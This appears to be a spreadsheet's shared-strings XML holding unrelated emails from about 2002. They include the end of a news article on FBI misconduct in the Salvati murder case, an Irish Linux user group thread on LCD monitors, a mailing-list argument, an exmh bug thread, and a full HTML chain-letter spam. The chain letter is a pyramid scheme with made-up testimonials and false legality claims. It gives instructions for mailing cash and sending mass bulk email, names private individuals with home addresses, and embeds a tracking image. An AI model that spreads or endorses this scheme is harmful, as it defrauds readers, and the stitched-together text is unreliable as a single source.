 Asked about the documents showing that Mr. Hoover knew of Mr.
 Salvati's innocence when he was put on trial, Gail Marcinkiewicz, a
 spokeswoman for the F.B.I. in Boston, declined to comment, citing the
 pending litigation.
 A Justice Department task force is continuing to investigate
 misconduct in the Boston office. In one of the first results of the
 investigation, one retired agent, John J. Connolly, is awaiting
 sentencing next month after being convicted of racketeering and
 obstruction of justice for helping two other mob leaders who were
 F.B.I. informers, James Bulger and Stephen Flemmi. Vincent and
 Stephen Flemmi are brothers.
 The Government Reform Committee, led by Representative Dan Burton,
 Republican of Indiana, has uncovered memorandums from the Boston
 office to headquarters in Washington revealing the bureau's knowledge
 that Vincent Flemmi and Mr. Barboza were involved in killing Mr.
 Deegan. A memorandum a week after the killing described the crime,
 including who fired the first shot.
 Then, on June 4, 1965, Mr. Hoover's office demanded to know what
 progress was being made in developing Vincent Flemmi as an informer.
 In a reply five days later, the special agent in charge of the Boston
 office said that Mr. Flemmi was in a hospital recovering from gunshot
 wounds but because of his connections to Mr. Patriarca "potentially
 could be an excellent informant."
 The agent also informed Mr. Hoover that Mr. Flemmi was known to have
 killed seven men, "and, from all indications, he is going to continue
 to commit murder." Nevertheless, the agent said, "the informant's
 potential outweighs the risk involved."
 A Congressional investigator called the exchange chilling. "The most
 frightening part is that after being warned about Flemmi's murders,
 the director does not even respond," the investigator said. "There is
 no message not to use a murderer as a government informant."
 The origin of the corruption scandal was public and political
 pressure on Mr. Hoover to move more forcefully against the growing
 power of the Mafia, which he had largely ignored. In Boston, F.B.I.
 agents recruited Mr. Barboza and Mr. Flemmi and developed close ties
 to a rival criminal organization, the Winter Hill Gang, led by Mr.
 Bulger.
 Both sides got what they wanted, according to the investigations and
 the trial of Mr. Connolly. The F.B.I. got information that eventually
 helped destroy the Patriarca and Angiulo families, which controlled
 organized crime in New England. Mr. Bulger's gang was able to take
 over the rackets in Boston, sell drugs and even commit murder while
 the F.B.I. looked the other way.
 One reason the F.B.I. may not have used its information about Mr.
 Patriarca's involvement in the Deegan murder, Congressional
 investigators say, is that it came from an illegal listening device
 in his Providence, R.I., headquarters. The F.B.I. agent who
 transcribed the conversation made it appear that the information was
 coming from unnamed informants, to disguise the use of the device,
 the investigators say.
 Mr. Salvati, a former truck driver, now 69, had his sentence commuted
 in 1997 by Gov. William F. Weld. Last year, while he was still on
 parole, his murder conviction was dismissed by a Massachusetts state
 judge after the Justice Department task force made public documents
 suggesting his innocence.
 Two of the other wrongly convicted men died in prison. Their
 survivors have joined the fourth man, Peter Limone, in a $375 million
 lawsuit against the Justice Department. Mr. Limone was sentenced to
 die in the electric chair. His life was spared only when
 Massachusetts outlawed the death penalty in 1974.
 Mr. Salvati lives in a modest apartment in Boston's North End with
 his wife, Marie, who visited him in prison every week during those 30
 years. Each week Mr. Salvati sent her a romantic card, which she put
 on the television set. It was, Mr. Garo said, all they had of each
 other.
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPWmB2sPxH8jf3ohaEQL9qgCgxHq0ee06UEsNv8u8wgvmjf9K7S4An3Rb
 3srsGomWjNDwIaKoEHOfNHpI
 =OELD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</si>
  <si>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Subject: Re: Your bank account
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="MSHTML 6.00.2600.0" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;FONT face="Times New Roman" size=3&gt;Dear 
 Friend,&lt;BR&gt;&lt;BR&gt;A recent survey by Nielsen/Netratings says that "The Internet 
 &lt;BR&gt;population is rapidly approaching a 'Half a Billion' people!"&lt;BR&gt;&lt;BR&gt;SO WHAT 
 DOES ALL THIS MEAN TO YOU? EASY MONEY!!&lt;BR&gt;&lt;BR&gt;Let's assume that every person 
 has only one E-mail address...&lt;BR&gt;that's 500 million potential customers and 
 growing! In addition,&lt;BR&gt;E'mail is without question the most powerful 
 method of distributing&lt;BR&gt;information on the face of the earth.&lt;BR&gt;&lt;BR&gt;Well, I 
 think you get the picture. The numbers and potential are &lt;BR&gt;just 
 staggering, but it gets even better...&lt;BR&gt;&lt;BR&gt;Suppose I told you that you could 
 start your own E-mail business&lt;BR&gt;today and enjoy these 
 benefits:&lt;BR&gt;&lt;BR&gt; *** All Customers Pay You In 
 Cash!!!&lt;BR&gt; *** You Will Sell A Product Which Costs 
 Nothing to Produce!&lt;BR&gt; *** Your Only Overhead Is Your 
 Time!&lt;BR&gt; *** You Have 100s Of Millions Of Potential 
 Customers!!!&lt;BR&gt; *** You Get Detailed, Easy To Follow 
 Startup 
 Instructions!&lt;BR&gt;&lt;BR&gt; AND 
 THIS IS JUST THE TIP OF THE ICEBERG . . .&lt;BR&gt;As you read on you'll discover how 
 a 'Seen on National TV' &lt;BR&gt;program is paying out a half million dollars, every 
 4 to 5 months&lt;BR&gt;from your home, for an investment of only $25 US Dollars 
 expense,&lt;BR&gt;one time. ALL THANKS TO THE COMPUTER AGE . . . &lt;BR&gt;AND THE 
 INTERNET!&lt;BR&gt;&lt;BR&gt;Before you say "Bull", please read the following:&lt;BR&gt;This is 
 the letter you have been hearing about on the news&lt;BR&gt;lately. Due to the 
 popularity of this letter on the Internet,&lt;BR&gt;a national weekly news program 
 recently devoted an entire&lt;BR&gt;show to the investigation of this program 
 described below,&lt;BR&gt;to see if it really can make people money.&lt;BR&gt;&lt;BR&gt;The show 
 also investigated whether or not the program was&lt;BR&gt;legal. Their findings 
 proved once and for all that there are&lt;BR&gt;"absolutely NO laws prohibiting the 
 participation in the&lt;BR&gt;program and if people can follow the simple 
 instructions,&lt;BR&gt;they are bound to make some mega bucks with only $25 out 
 of&lt;BR&gt;pocket cost".&lt;BR&gt;&lt;BR&gt; DUE TO THE RECENT INCREASE 
 OF POPULARITY&lt;BR&gt; AND RESPECT THIS PROGRAM HAS 
 ATTAINED,&lt;BR&gt; IT IS CURRENTLY WORKING BETTER THAN 
 EVER!&lt;BR&gt;&lt;BR&gt;***** This is what one had to say:&lt;BR&gt;&lt;BR&gt;"Thanks to this 
 profitable opportunity. I was approached many&lt;BR&gt;times before but each 
 time I passed on it. I am so glad I&lt;BR&gt;finally joined just to see what one 
 could expect in return&lt;BR&gt;for the minimal effort and money required. To my 
 asonishment,&lt;BR&gt;I received total $610,470.00 in 21 weeks, with money 
 still&lt;BR&gt;coming 
 in".&lt;BR&gt;&lt;BR&gt; Pam 
 Hedland, Fort Lee, New 
 Jersey&lt;BR&gt;----------------------------------------------------------------&lt;BR&gt;Here 
 is another testimonial:&lt;BR&gt;&lt;BR&gt;"This program has been around for a long time but 
 I never&lt;BR&gt;believed in it. But one day when I received this again in 
 &lt;BR&gt;the mail I decided to gamble my $25 on it. I followed the&lt;BR&gt;simple 
 instructions and walaa. . . . 3 weeks later the money&lt;BR&gt;started to come 
 in. First month I only made $240.00 but the&lt;BR&gt;next 2 months after that I 
 made a total of $290,000.00.&lt;BR&gt;So far, in the past 8 months by re-entering the 
 program, I &lt;BR&gt;have made over $710,000.00 and I am playing it again.&lt;BR&gt;&lt;BR&gt;The 
 key to success in this program is to follow the simple&lt;BR&gt;steps and NOT change 
 anything."&lt;BR&gt;&lt;BR&gt;More testimonials later but first:&lt;BR&gt;&lt;BR&gt;** PRINT THIS NOW 
 FOR YOUR FUTURE REFERENCE&lt;BR&gt;&lt;BR&gt;If you would like to make at least $500,000 
 every 4 to 5 &lt;BR&gt;months easily and comfortably, please read the following . . 
 .&lt;BR&gt;THEN READ IT AGAIN and AGAIN!!!&lt;BR&gt;&lt;BR&gt;**FOLLOW THESE SIMPLE 
 INSTRUCTIONS,&lt;BR&gt; TO MAKE YOUR FINANCIAL DREAMS 
 &lt;BR&gt; COME 
 TRUE**&lt;BR&gt;&lt;BR&gt;INSTRUCTIONS:&lt;BR&gt;-------------------&lt;BR&gt;***** Order all 5 reports 
 shown on the list below.&lt;BR&gt;&lt;BR&gt;***** For each report, send $5 US CASH, THE NAME 
 &amp; &lt;BR&gt;NUMBER OF THE REPORT YOU ARE ORDERING and&lt;BR&gt;YOUR E-MAIL ADDRESS to 
 the person whose name appears&lt;BR&gt;ON THAT LIST next to the 
 report.&lt;BR&gt;&lt;BR&gt; MAKE SURE YOUR RETURN ADDRESS IS ON 
 YOUR&lt;BR&gt; ENVELOPE TOP LEFT CORNER in case of any 
 mail&lt;BR&gt; problems.&lt;BR&gt;&lt;BR&gt; 
 *****When you place your order, make 
 sure&lt;BR&gt; 
 you order each of the 5 reports *****&lt;BR&gt;&lt;BR&gt;You will need all 5 reports so that 
 you can save them on your&lt;BR&gt;computer and resell them.&lt;BR&gt;&lt;BR&gt;YOUR TOTAL COST $5 
 X 5 = $25.00&lt;BR&gt;&lt;BR&gt;**********Within a few days you will receive, via e-mail, 
 each&lt;BR&gt;of the 5 reports from these 5 different individuals. Save&lt;BR&gt;them 
 on your computer so they will be accessible for you to&lt;BR&gt;send to the 1,000's of 
 people who will order them from you.&lt;BR&gt;Also make a floppy of these reports and 
 keep it at your desk&lt;BR&gt;in case something happens to your 
 computer.&lt;BR&gt;&lt;BR&gt;**********IMPORTANT - DO NOT alter the names of the 
 people&lt;BR&gt;who are listed next to each report, or their sequence on the &lt;BR&gt;list, 
 in any way other than what is intructed below in steps&lt;BR&gt;1 through 6 or you 
 will lose out on the majority of your profits.&lt;BR&gt;Once you understand the way 
 this works, you will also see how&lt;BR&gt;it does not work if you change 
 it.&lt;BR&gt;&lt;BR&gt;Remember, this method has been tested, and if you alter,&lt;BR&gt;it will 
 NOT work!!!&lt;BR&gt;&lt;BR&gt;People have tried to put their friends/relatives names 
 on&lt;BR&gt;all five thinking they could get all the money. But it does&lt;BR&gt;not 
 work this way. Believe us, we have tried to be greedy&lt;BR&gt;and then nothing 
 happened.&lt;BR&gt;&lt;BR&gt;So do not try to change anything other than what is 
 instructed.&lt;BR&gt;Because if you do, it will not work for you. 
 Remember,&lt;BR&gt;honesty reaps the reward!!!&lt;BR&gt;&lt;BR&gt;1. After you have ordered all 5 
 reports, take this &lt;BR&gt;advertisement and REMOVE the name and address of the 
 person in&lt;BR&gt;REPORT # 5. This person has made it through the cycle and is 
 &lt;BR&gt;no doubt counting their fortune.&lt;BR&gt;&lt;BR&gt;2. Move the name &amp; address in 
 REPORT #4 down to REPORT #5.&lt;BR&gt;3. Move the name &amp; address in REPORT #3 down 
 to REPORT #4.&lt;BR&gt;4. Move the name &amp; address in REPORT #2 down to REPORT 
 #3.&lt;BR&gt;5. Move the name &amp; address in REPORT #1 down to REPORT #2.&lt;BR&gt;6. 
 Insert YOUR name &amp; address in the REPORT #1 Position.&lt;BR&gt;&lt;BR&gt;PLEASE MAKE 
 SURE you copy every name &amp; 
 address&lt;BR&gt;ACCURATELY!&lt;BR&gt;-----------------------------------------------------------------------------&lt;BR&gt;&lt;BR&gt;Take 
 this entire letter, with the modified list of names,&lt;BR&gt;and save it on your 
 computer. DO NOT MAKE ANY OTHER&lt;BR&gt;CHANGES. Save this on a disk as 
 well just in case you loose&lt;BR&gt;any data.&lt;BR&gt;&lt;BR&gt;To assist you with marketing 
 your business on the Internet,&lt;BR&gt;the 5 reports you purchase will provide you 
 with invaluable&lt;BR&gt;marketing information that includes: How to send bulk 
 e-mails&lt;BR&gt;legally, Where to find thousand of free classified ads and &lt;BR&gt;much, 
 much more.&lt;BR&gt;&lt;BR&gt;There are 2 Primary methods to get this venture 
 going:&lt;BR&gt;&lt;BR&gt; METHOD #1: SENDING BULK E-MAIL 
 LEGALLY&lt;BR&gt; 
 ---------------------------------------------------------&lt;BR&gt;Let's say that you 
 decide to start small, just to see how&lt;BR&gt;it goes, and we'll assume you and 
 those involved send out&lt;BR&gt;only 5,000 emails each. Let's also assume that 
 the mailing&lt;BR&gt;receives only a 0.2% response (the response could be 
 much&lt;BR&gt;better but lets just say it is only 0.2%. Also, many 
 people&lt;BR&gt;will send out hundreds of thousands of e-mails instead of&lt;BR&gt;only 
 5,000 each).&lt;BR&gt;&lt;BR&gt;Continuing with this example, you send out only 5,000 
 e-mails.&lt;BR&gt;With a 0.2% response, that is only 10 orders for Report #1.&lt;BR&gt;Those 
 10 people resonded by sending out 5,000 e-mails each&lt;BR&gt;for a total of 
 50,000. Out of those 50,000 e-mails only 0.2%&lt;BR&gt;responded with 
 orders. That's 100 people responded and&lt;BR&gt;ordered Report #2. Those 
 100 people mail out 5,000 e-mails&lt;BR&gt;each for a total of 500,000 e-mails. 
 The 0.2% response to &lt;BR&gt;that is 1000 orders for Report #3.&lt;BR&gt;&lt;BR&gt;Thoe 1000 
 people send out 5,000 e-mails each for a total of&lt;BR&gt;5 million e-mails sent 
 out. The 0.2% response to that is&lt;BR&gt;10,000 orders for Report #4. 
 Those 10,000 people send out&lt;BR&gt;5,000 e-mails each for a total of 50,000,000 (50 
 million)&lt;BR&gt;e-mails. the 0.2% response to that is 100,000 orders 
 for&lt;BR&gt;Report #5.&lt;BR&gt;&lt;BR&gt;THAT'S 100,000 ORDERS TIMES $5 EACH = 500,000&lt;BR&gt;(a 
 half a million).&lt;BR&gt;&lt;BR&gt; Your total income in this 
 example is:&lt;BR&gt; 1......$50 +&lt;BR&gt; 
 2......$500 +&lt;BR&gt; 3......$5,000 
 +&lt;BR&gt; 4......$50,000 +&lt;BR&gt; 
 5......$500,000 .................. Grand Total = 
 $555,550.00&lt;BR&gt;&lt;BR&gt; NUMBERS DO NOT LIE. GET A 
 PENCIL &amp; PAPER AND&lt;BR&gt; FIGURE OUT THE WORST POSSIBLE 
 RESPONSES AND &lt;BR&gt; NO MATTER HOW YOU CALCULATE IT, YOU 
 WILL&lt;BR&gt; STILL MAKE A LOT OF 
 MONEY!&lt;BR&gt;----------------------------------------------------------------------&lt;BR&gt; 
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10&lt;BR&gt; PEOPLE 
 ORDERING OUT OF 5,000 PEOPLE YOU MAILED.&lt;BR&gt;&lt;BR&gt;Dare to think for a moment what 
 would happen if everyone,&lt;BR&gt;or 1/2, or even 1/5 of those people mailed 100,000 
 e-mails&lt;BR&gt;each or more? There are over 250 million people on the 
 &lt;BR&gt;Internet worldwide and counting. Believe me, many people&lt;BR&gt;will do 
 just that, and more!&lt;BR&gt;&lt;BR&gt; METHOD #2: PLACING 
 FREE ADS ON THE INTERNET&lt;BR&gt; 
 &lt;BR&gt;---------------------------------------------------------------------&lt;BR&gt;Advertising 
 on the net is very, very inexpensive and there&lt;BR&gt;are hundreds of FREE places to 
 advertise. Placing a lot of&lt;BR&gt;free ads on the internet will easily get a 
 larger response.&lt;BR&gt;We strongly suggest you start with method # 1 and add 
 METHOD&lt;BR&gt;# 2 as you go along.&lt;BR&gt;&lt;BR&gt;For every $5 you receive, all you must do 
 is e-mail them the &lt;BR&gt;Report they ordered. That's it! Always 
 provide same day&lt;BR&gt;service on all orders. This will guarantee that the 
 e-mails&lt;BR&gt;they send out, with your name and address on it, will be&lt;BR&gt;prompt 
 because they can not advertise until they receive 
 the&lt;BR&gt;report.&lt;BR&gt;&lt;BR&gt; ORDER EACH REPORT BY IT NUMBER 
 &amp; NAME ONLY.&lt;BR&gt;&lt;BR&gt;Note: Always send $5 cash (US Currency) for each 
 report.&lt;BR&gt;Checks are NOT accepted. Make sure the cash is wrapped in&lt;BR&gt;at 
 lease 2 sheets of paper before you put it in the envelope.&lt;BR&gt;On one of those 
 sheets of paper, write the NUMBER and the NAME&lt;BR&gt;of the Report you are 
 ordering, your email ADDRESS, your NAME&lt;BR&gt;and postal address. Make sure 
 you affix the proper 'International'&lt;BR&gt;Postage if ordering a report from 
 outside your country.&lt;BR&gt;&lt;BR&gt; PLACE YOUR ORDER FOR THESE 
 REPORTS 
 NOW:&lt;BR&gt;-------------------------------------------------------------------------&lt;BR&gt;&lt;BR&gt;Report 
 #1: The Insider's Guide to Advertising for Free on the Net&lt;BR&gt;Order Report 
 #1 from:&lt;BR&gt;&lt;BR&gt;K.J. Nickels&lt;BR&gt;P.O. Box 739&lt;BR&gt;Waukesha, WI 
 53187&lt;BR&gt;&lt;BR&gt;______________________________________________________&lt;BR&gt;&lt;BR&gt;Report 
 #2: The Insider's Guide to Sending Bulk e-mail on the Net&lt;BR&gt;Order Report 
 #2 from:&lt;BR&gt;&lt;BR&gt;K. Heritage&lt;BR&gt;6933 W. University Ave #610&lt;BR&gt;Gainsville, FL 
 32607&lt;BR&gt;_______________________________________________________&lt;BR&gt;&lt;BR&gt;Report 
 #3: Secret to Multilevel marketing on the Net:&lt;BR&gt;Order Report #3 
 from:&lt;BR&gt;&lt;BR&gt;T. Turner&lt;BR&gt;5317 Bonner Dr.&lt;BR&gt;Corpus Christie, TX 
 78411&lt;BR&gt;______________________________________________________&lt;BR&gt;&lt;BR&gt;Report 
 #4: How to become a Millionaire utilizing MLM &amp; the Net&lt;BR&gt;Order 
 Report #4 from:&lt;BR&gt;&lt;BR&gt;Mel Hahn&lt;BR&gt;111 Wilmont Drive Unit G&lt;BR&gt;Waukesha, WI 
 53189&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;______________________________________________________&lt;BR&gt;&lt;BR&gt;Report 
 #5: How to send out One Million e-mails&lt;BR&gt;Order Report #5 from:&lt;BR&gt;&lt;BR&gt;J. 
 Frid&lt;BR&gt;13324 Radisson Rd. N.E.&lt;BR&gt;Ham Lake, MN 
 55304&lt;BR&gt;______________________________________________________&lt;BR&gt;&lt;BR&gt;There are 
 currently almost 500,000,000 people online worldwide!&lt;BR&gt;&lt;BR&gt;$$$$$$$$$$ YOUR 
 SUCCESS GUIDLINES$$$$$$$$$$&lt;BR&gt;&lt;BR&gt;Follow these guidlines to guarantee your 
 success:&lt;BR&gt;************************************&lt;BR&gt;If you do not receive at 
 least 10 orders for Report #1 within&lt;BR&gt;2 weeks, continue sending e-mails until 
 you do.&lt;BR&gt;&lt;BR&gt;After you have received 10 orders, 2 to 3 weeks after that&lt;BR&gt;you 
 should receive 100 orders or more for Report #2. If you&lt;BR&gt;did not, 
 continue advertising or sending e-mails until you do.&lt;BR&gt;&lt;BR&gt;Once you have 
 received 100 or more orders for Report #2, YOU&lt;BR&gt;CAN RELAX, because the system 
 is already working for you,&lt;BR&gt;and the cash will continue to roll 
 in!!&lt;BR&gt;&lt;BR&gt;THIS IS IMPORTANT TO REMEMBER: Every time your name&lt;BR&gt;is moved down 
 the list, you are placed in front of a &lt;BR&gt;different report.&lt;BR&gt;&lt;BR&gt;You can KEEP 
 TRACK of your PROGRESS by watching which&lt;BR&gt;report people are ordering form 
 you.&lt;BR&gt;&lt;BR&gt;IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHER&lt;BR&gt;BATCH OF E-MAILS 
 AND START THE WHOLE PROCESS&lt;BR&gt;AGAIN. There is NO LIMIT to the income you 
 can generate&lt;BR&gt;from this 
 business!!!&lt;BR&gt;________________________________________________________&lt;BR&gt;&lt;BR&gt; 
 FOLLOWING IS A NOTE FROM THE ORIGINATOR&lt;BR&gt; OF THIS 
 PROGRAM:&lt;BR&gt;&lt;BR&gt;You have just received information that can give you 
 financial&lt;BR&gt;freedom for the rest of your life, with NO RISK and JUST 
 A&lt;BR&gt;LITTLE BIT OF EFFORT. You can make more money in the next&lt;BR&gt;few 
 weeks and months than you have ever imagined.&lt;BR&gt;&lt;BR&gt;Follow the program EXACTLY 
 AS INSTRUCTED. Do not change&lt;BR&gt;it in any way. It works exceedings 
 well as it is now.&lt;BR&gt;Remember to e-mail a copy of this exciting report after 
 you&lt;BR&gt;have put your name and address in Report #1 and moved others&lt;BR&gt;to 
 #2..........#5 as instructed above. One of the people&lt;BR&gt;you send this to 
 may send out 100,000 or more emails and your&lt;BR&gt;name will be on every one of 
 them. Remember though, the more&lt;BR&gt;you send out the more potential 
 customers you will reach.&lt;BR&gt;&lt;BR&gt;So my friend, I have given you the ideas, 
 information,&lt;BR&gt;materials and opportunity to become financially 
 independent.&lt;BR&gt;IT IS UP TO YOU NOW!&lt;BR&gt;&lt;BR&gt;**********MORE 
 TESTIMONIALS**********&lt;BR&gt;&lt;BR&gt;"My name is Mitchell. My wife Jody and I 
 live in Chicago.&lt;BR&gt;I am an accountant with a major US Corporation and I 
 make&lt;BR&gt;pretty good money. When I received this program I grumbled&lt;BR&gt;to 
 Jody about receiving "junk mail". I made fun of the&lt;BR&gt;whole thing, 
 spouting my knowledge of the population and&lt;BR&gt;percentages involved. I 
 "knew" it wouldn't work. Jody&lt;BR&gt;totally ignored my supposed intelligence 
 and a few days later&lt;BR&gt;she jumped in with both feet. I made merciless fun 
 of her,&lt;BR&gt;and was ready to lay the old "I told you so" on her when&lt;BR&gt;the thing 
 didn't work. Well, the laugh was on me! Within&lt;BR&gt;3 weeks she had 
 received 50 responses. Within the next 45&lt;BR&gt;days she had received a total 
 of $147,200.00 all cash!&lt;BR&gt;I was shocked. I have joined Jody in her 
 "hobby".&lt;BR&gt;&lt;BR&gt; Mitchell Wof, Chicago, 
 Illinois&lt;BR&gt;----------------------------------------------------------------&lt;BR&gt;&lt;BR&gt;"Not 
 being the gambling type, it took me several weeks to&lt;BR&gt;make up my mind to 
 participate in this plan. But conservative&lt;BR&gt;that I am, I decided that 
 the initial investment was so little&lt;BR&gt;that there was just no way that I 
 wouldn't get enough orders&lt;BR&gt;to at least get my money back. I was 
 surprised when I found&lt;BR&gt;my medium sized post office box crammed with 
 orders. I made&lt;BR&gt;$319,210.00 in the first 12 weeks. The nice thing 
 about this&lt;BR&gt;deal is that it does not matter where people live. 
 There&lt;BR&gt;simply isn't a better investment with a faster return and&lt;BR&gt;so 
 big".&lt;BR&gt;&lt;BR&gt; Dan Sondstrom, Alberta, 
 Canada&lt;BR&gt;---------------------------------------------------------------&lt;BR&gt;&lt;BR&gt;"I 
 had received this program before. I deleted it, but later&lt;BR&gt;I wondered if 
 I should hav given it a try. Of course, I&lt;BR&gt;had no idea who to contact to 
 get another copy, so I had to&lt;BR&gt;wait until I was e-mailed again by someone else 
 . . . . . . . &lt;BR&gt;11 months passed then it luckily came again. I did not 
 &lt;BR&gt;delete this one! I made more than $490,000 on my first try&lt;BR&gt;and all 
 the money came within 22 weeks".&lt;BR&gt;&lt;BR&gt; Susan De 
 Suza, New York, 
 NY&lt;BR&gt;--------------------------------------------------------------&lt;BR&gt;&lt;BR&gt;"It 
 really is a great opportunity to make relatively easy&lt;BR&gt;money with little cost 
 to you. I followed the simple&lt;BR&gt;instructions carefully and within 10 days 
 the money started&lt;BR&gt;to come in. My first month I made $20,560.00 and by 
 the&lt;BR&gt;end of the third month my total cash count was $362,840.00.&lt;BR&gt;Life is 
 beautiful, thanks to the Internet".&lt;BR&gt;&lt;BR&gt; Fred 
 Dellaca, Westport, New 
 Zealand&lt;BR&gt;---------------------------------------------------------------&lt;BR&gt;&lt;BR&gt;ORDER 
 YOUR REPORTS TODAY AND GET STARTED&lt;BR&gt;ON YOUR ROAD TO FINANCIAL 
 FREEDOM!&lt;BR&gt;&lt;BR&gt;---------------------------------------------------------------&lt;BR&gt;&lt;BR&gt;If 
 you have any questions of the legality of this program,&lt;BR&gt;contact the Office of 
 Associate Director of Marketing&lt;BR&gt;Practices, Federal Trade Commission, Bureau 
 of Consumer&lt;BR&gt;Protection, Washington, D.C. We are not the authors of this 
 program &lt;BR&gt;and do not warrant any guarantees as to how much earnings you 
 will&lt;BR&gt;achieve. This is a one time mailing. If you wish to be 
 removed from &lt;BR&gt;our list please reply to this e-mail with "remove" in the 
 subject line&lt;BR&gt;and you will be removed immediately. 
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;img 
 src="http://www.myhomeontheweb.com/cust/open.html"&gt;&lt;/A&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 02, 2002 at 08:40:10PM +0100 or so it is rumoured hereabouts, 
 Niall O Broin thought:
 &gt; On Fri, Aug 02, 2002 at 05:21:22PM +0100, Conor Daly wrote:
 &gt; 
 &gt; &gt; My 17" CRT monitor having drowned in a flood (10cm squared of burned 
 &gt; &gt; circuit board URGH!) , I'm thinking of a 15" LCD as a replacement.  
 &gt; &gt; What with me going to the continent and all next week, I might wait and 
 &gt; &gt; buy one there (for a reasonable price (Dave Neary!  Any good sources?)).
 &gt; 
 &gt; Conor - it's a rather large continent - people might need to know where you
 &gt; are going to suggest sources. And if you're buying abroad, make sure you get
 &gt; to test it - many places won't have facilities for you to do that.
 Um yeah, I suppose that'd be useful info...  Western France, La Rochelle
 area.  Test as in test with Linux or just turn on and see that it works?
 &gt; &gt; Question is: CAn I just plug in _any_ lcd monitor and expect it to work?  
 &gt; &gt; Are there special incantations needed for XFree86 to work.  Needless to
 &gt; &gt; say, it'll be a bit difficult to bring it back to the shop once I'm home 
 &gt; &gt; in Dublin and find it doesn't work!
 &gt; 
 &gt; Any monitor should just work - they all have VGA connectors and any half
 &gt; decent brand will be know about by XFree setup programs in modern
 &gt; distributions. However, if you have the budget (insurance paying for the
 &gt; dead monitor, perhaps ? - and WHERE was your monitor that it got caught in a
 Bathroom upstairs, Computer desk downstairs, got dripped into, started
 clicking rapidly and smoking before it was noticed and unplugged...
 &gt; flood ?) getting a monitor with a DVI input is best. Of course, you'll need
 &gt; a DVI out video card then, too. DVI provides a much better picture than VGA
 I guess that requires something more in the way of budget then...  Given
 that this monitor was serving as the single monitor for 4 boxen (via a
 4-way vga KVM switch), I'd be looking at investing in 4 DVI cards along
 with another KVM to suit while a VGA version _should_ just plug into
 place. 
 Conor
 -- 
 Conor Daly &lt;conor.daly@oceanfree.net&gt;
 Domestic Sysadmin :-)
 ---------------------
 Faenor.cod.ie
   5:20pm  up 72 days,  2:37,  0 users,  load average: 0.08, 0.02, 0.01
 Hobbiton.cod.ie
   5:19pm  up 14 days, 23:42,  1 user,  load average: 0.01, 0.04, 0.00
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Mon, 9 Sep 2002, Eugen Leitl wrote:
 &gt; On Sun, 8 Sep 2002, CDale wrote:
 &gt; 
 &gt; &gt; I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gays
 &gt; 
 &gt; So how many of your hetero friends had &gt;3 k lovers?
 None.  How many of my gay friends have had &gt; 3k lovers?  None.
 &gt; 
 &gt; &gt; are promiscuous, and so are hets, but I betcha gays are more
 &gt; &gt; AIDSphobic than hets, generally speaking....
 &gt; 
 &gt; The virus load issue is orthogonal to the fact. Bzzt. Switch on your
 &gt; brain, you both. I was mentioning that a subpopulation outside of the sex
 &gt; industry is/used to be extremely promiscuous, about two orders of
 &gt; magnitude higher than average.
 two orders of magnitude higher than average isn't 3k, I don't think.  Why 
 don't ya give us a url or something that told you all this stuff?  Or did 
 you just pull it out of your ass?  (:
 C
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: new bugs
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-2058972181P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Thu, 18 Jul 2002 18:21:28 -0500
 &gt;
 &gt; &gt; From:  Anders Eriksson &lt;aeriksson@fastmail.fm&gt;
 &gt; &gt; Date:  Thu, 18 Jul 2002 11:57:06 +0200
 &gt; &gt;
 &gt; &gt; 
 &gt; &gt; I just installed from cvs as of today and compared to cvs as of ~2 
 &gt; &gt; months ago:
 &gt; &gt; 
 &gt; &gt; +Snapper behaviour when 'n'ing through mails! Nice!
 &gt; &gt; 
 &gt; &gt; -my bgprocessing runs flist each minute. What happens is that the 
 &gt; &gt; flist goes blank for about 0.5 seconds and then redisplays from the 
 &gt; &gt; top of the list. This, while I was reading messages somewhere in the 
 &gt; &gt; middle of the list.
 &gt; &gt; 
 &gt; &gt; -new messgaes tends to be colored in black (as if read) although the 
 &gt; &gt; are not. It is especially obvious since my scan format slaps in a 'U' 
 &gt; &gt; after the msg id for those messages.
 &gt; &gt; 
 &gt; &gt; -the current mgs marker '+' seems to disappear after the bg flist. 
 &gt; &gt; Don't really know if that matters though. They are still there on 
 &gt; &gt; disk according to nmh.
 &gt; 
 &gt; I fixed the last and least important one.
 &gt; 
 &gt; After making flist run once a minute, I've seen the first two, but they don't 
 &gt; always occur.  I'll keep looking.
 I think I found the bug that caused this.  However, since I couldn't make it 
 happen every single time, I may have just been lucky since I made my change.  
 At any rate, the change I just made is clearly more correct than what was 
 there before.
 Let me know if I'm mistaken.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-2058972181P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9OIGtK9b4h5R0IUIRAthIAJ4wtss7gIde5srJW7/X8naPwCfakgCbBQ3Z
 DJAuHklXX3TlR8pVjp2LWIA=
 =Dqvl
 -----END PGP SIGNATURE-----
 --==_Exmh_-2058972181P--
 _______________________________________________
 Exmh-workers mailing list
